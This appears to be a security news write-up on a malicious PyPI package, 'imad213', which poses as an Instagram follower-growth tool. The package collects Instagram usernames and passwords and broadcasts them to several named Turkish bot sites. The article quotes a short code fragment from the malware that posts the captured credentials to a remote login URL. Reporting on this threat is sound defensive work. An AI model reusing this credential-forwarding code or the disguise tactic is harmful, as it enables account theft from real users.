A sophisticated Python-based malware campaign has emerged targeting Instagram users desperate for social media growth, disguising itself as a legitimate follower-boosting tool while secretly harvesting login credentials.
The malicious PyPI package, identified as “imad213,” presents itself professionally on GitHub with detailed documentation advertising Instagram enhancement features, convincing unsuspecting users to download what they believe is a genuine growth service.
The malware employs advanced social engineering tactics, complete with professional branding and installation instructions that mirror legitimate software packages.
.png
)
Users are instructed to simply run “pip install imad213” followed by the command “imad213” to begin boosting their follower counts.
.webp)
Socket.dev analysts identified this credential harvester as part of a broader attack toolkit created by threat actor “IMAD-213,” who operates under the email address [email protected] and maintains multiple malicious tools targeting different platforms.
The attack vector proves particularly dangerous because it exploits users’ desire for social media validation, a psychological vulnerability that makes victims more likely to ignore security warnings.
Once executed, the tool displays convincing “INSTA-FOLLOWERS” branding that reinforces users’ expectations, making them comfortable entering their actual Instagram credentials.
The malware implements a remote kill switch through a Netlify-hosted control file, allowing the attacker to maintain operational control over all deployed instances worldwide.
The scope of this campaign extends beyond individual credential theft, as compromised accounts face immediate policy violations under Instagram’s Terms of Use, potentially resulting in account suspension or permanent termination.
With Instagram’s 2 billion monthly active users representing a prime target, the platform’s engagement-driven algorithm has created a lucrative market for both legitimate and malicious growth services.
Credential Broadcast Network: The Hidden Danger
The most alarming aspect of this malware lies in its credential distribution mechanism, which broadcasts stolen login information to ten different Turkish bot services simultaneously.
After collecting Instagram usernames and passwords through a deceptive interface, the malware executes the following code structure:-
login_data = {
"username": username,
"password": password,
"userid": "",
"antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
response = session. Post(login_url, headers=headers, data=login_data).webp)
This credential broadcast targets services including takipcimx.net, takipcizen.com, and bigtakip.net, all registered through the same Turkish telecom company within days of each other in June 2021.
The coordinated infrastructure suggests a sophisticated, long-term operation rather than opportunistic attacks, with all domains actively maintained and recently updated despite being operational for nearly four years.
Speed up and enrich threat investigations with Threat Intelligence Lookup! -> 50 trial search requests
